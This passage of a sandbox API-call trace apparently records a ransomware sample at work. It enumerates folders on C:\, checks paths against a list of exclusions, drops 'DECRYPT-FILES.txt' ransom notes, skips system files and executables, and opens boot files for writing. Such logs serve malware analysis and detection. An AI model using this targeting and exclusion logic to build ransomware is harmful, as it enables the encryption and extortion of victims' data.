(lpString1="$Recycle.Bin", lpString2="..") returned -1 [0179.185] lstrcatW (in: lpString1="$Recycle.Bin", lpString2="\\" | out: lpString1="$Recycle.Bin\\") returned="$Recycle.Bin\\" [0179.185] lstrcatW (in: lpString1="C:\\", lpString2="$Recycle.Bin\\" | out: lpString1="C:\\$Recycle.Bin\\") returned="C:\\$Recycle.Bin\\" [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Program Files") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch=":\\Windows") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Games\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\All Users") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.185] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="AhnLab") returned 0x0 [0179.186] StrStrW (lpFirst="C:\\$Recycle.Bin\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.186] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0179.186] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.186] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\\\0a16c9.tmp") returned 27 [0179.186] CreateFileW (lpFileName="C:\\$Recycle.Bin\\\\0a16c9.tmp" (normalized: "c:\\$recycle.bin\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.186] GetLastError () returned 0x5 [0179.186] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0179.186] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.186] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\\\DECRYPT-FILES.txt") returned 34 [0179.186] CreateFileW (lpFileName="C:\\$Recycle.Bin\\\\DECRYPT-FILES.txt" (normalized: "c:\\$recycle.bin\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.187] lstrlenW (lpString="C:\\$Recycle.Bin\\") returned 16 [0179.187] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\*") returned="C:\\$Recycle.Bin\\*" [0179.187] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479738 [0179.187] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.187] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.188] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.188] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.188] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6994860, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6994860, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6994860, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.188] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.188] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0179.188] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0179.188] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0179.188] lstrcatW (in: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0179.188] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\", lpString2="S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Program Files") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch=":\\Windows") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Games\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\All Users") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="AhnLab") returned 0x0 [0179.188] StrStrW (lpFirst="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.188] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0179.188] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.188] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\0a16c9.tmp") returned 74 [0179.188] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\0a16c9.tmp" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x230 [0179.189] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0179.189] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.189] wsprintfW (in: param_1=0x36fef64, param_2="%s\\%s" | out: param_1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt") returned 81 [0179.189] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\\\DECRYPT-FILES.txt" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.246] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0179.246] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="*" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*" [0179.246] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xedecdd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xedecdd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479878 [0179.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.246] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xedecdd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xedecdd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.246] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.246] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedecdd80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xedecdd80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xedecdd80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0179.246] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0179.246] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.246] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0179.246] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0179.247] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0179.247] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0179.247] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0179.247] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.247] lstrcpyW (in: lpString1=0x36fef54, lpString2="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0179.247] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp" [0179.247] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.250] CreateFileW (lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.250] CloseHandle (hObject=0x0) returned 0 [0179.250] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.250] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa69ba9c0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0179.250] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0179.250] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0179.250] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0179.251] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0179.251] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0179.251] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0179.251] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff784 | out: lpFindFileData=0x36ff784*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0179.251] FindClose (in: hFindFile=0x479878 | out: hFindFile=0x479878) returned 1 [0179.251] CloseHandle (hObject=0x230) returned 1 [0179.251] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xa69ba9c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa69ba9c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000\\", cAlternateFileName="S-1-5-~1")) returned 0 [0179.251] FindClose (in: hFindFile=0x479738 | out: hFindFile=0x479738) returned 1 [0179.251] CloseHandle (hObject=0xffffffff) returned 0 [0179.251] FindNextFileW (in: hFindFile=0x4796f8, lpFindFileData=0x36ffc7c | out: lpFindFileData=0x36ffc7c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77124864, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0179.251] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0179.251] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0179.251] lstrcatW (in: lpString1="Boot", lpString2="\\" | out: lpString1="Boot\\") returned="Boot\\" [0179.251] lstrcatW (in: lpString1="C:\\", lpString2="Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Program Files") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch=":\\Windows") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Games\\") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.251] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\All Users") returned 0x0 [0179.252] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.252] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.252] StrStrW (lpFirst="C:\\Boot\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.252] StrStrW (lpFirst="C:\\Boot\\", lpSrch="AhnLab") returned 0x0 [0179.252] StrStrW (lpFirst="C:\\Boot\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0179.252] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.252] lstrlenW (lpString="0a16c9.tmp") returned 10 [0179.252] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Boot\\\\0a16c9.tmp") returned 19 [0179.252] CreateFileW (lpFileName="C:\\Boot\\\\0a16c9.tmp" (normalized: "c:\\boot\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0179.252] GetLastError () returned 0x5 [0179.252] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.252] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0179.252] wsprintfW (in: param_1=0x36ff1e0, param_2="%s\\%s" | out: param_1="C:\\Boot\\\\DECRYPT-FILES.txt") returned 26 [0179.252] CreateFileW (lpFileName="C:\\Boot\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.253] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.253] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="*" | out: lpString1="C:\\Boot\\*") returned="C:\\Boot\\*" [0179.253] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479738 [0179.253] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0179.253] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0179.253] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0179.253] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0179.255] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="DECRYPT-FILES.txt") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="autorun.inf") returned 1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="boot.ini") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="desktop.ini") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="ntuser.dat") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="iconcache.db") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="bootsect.bak") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="ntuser.dat.log") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="thumbs.db") returned -1 [0179.255] lstrcmpiW (lpString1="BCD", lpString2="Bootfont.bin") returned -1 [0179.255] lstrlenW (lpString="C:\\Boot\\") returned 8 [0179.255] lstrlenW (lpString="BCD") returned 3 [0179.255] lstrcpyW (in: lpString1=0x36ff1d0, lpString2="C:\\Boot\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0179.255] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="BCD" | out: lpString1="C:\\Boot\\BCD") returned="C:\\Boot\\BCD" [0179.255] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.255] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.256] CloseHandle (hObject=0x0) returned 0 [0179.256] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.256] FindNextFileW (in: hFindFile=0x479738, lpFindFileData=0x36ffa00 | out: lpFindFileData=0x36ffa00*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="DECRYPT-FILES.txt") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="autorun.inf") returned 1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="boot.ini") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="desktop.ini") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="ntuser.dat") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="iconcache.db") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="bootsect.bak") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="ntuser.dat.log") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="thumbs.db") returned -1 [0179.256] lstrcmpiW (lpString1="BCD.LOG", lpString2="Bootfont.bin") returned -1 [0179.256] lstrlenW (lpString="BCD.LOG") returned 7 [0179.256] lstrcmpiW (lpString1="LOG", lpString2="lnk") returned 1 [0179.256] lstrcmpiW (lpString1="LOG", lpString2="exe") returned 1 [0179.256] lstrcmpiW 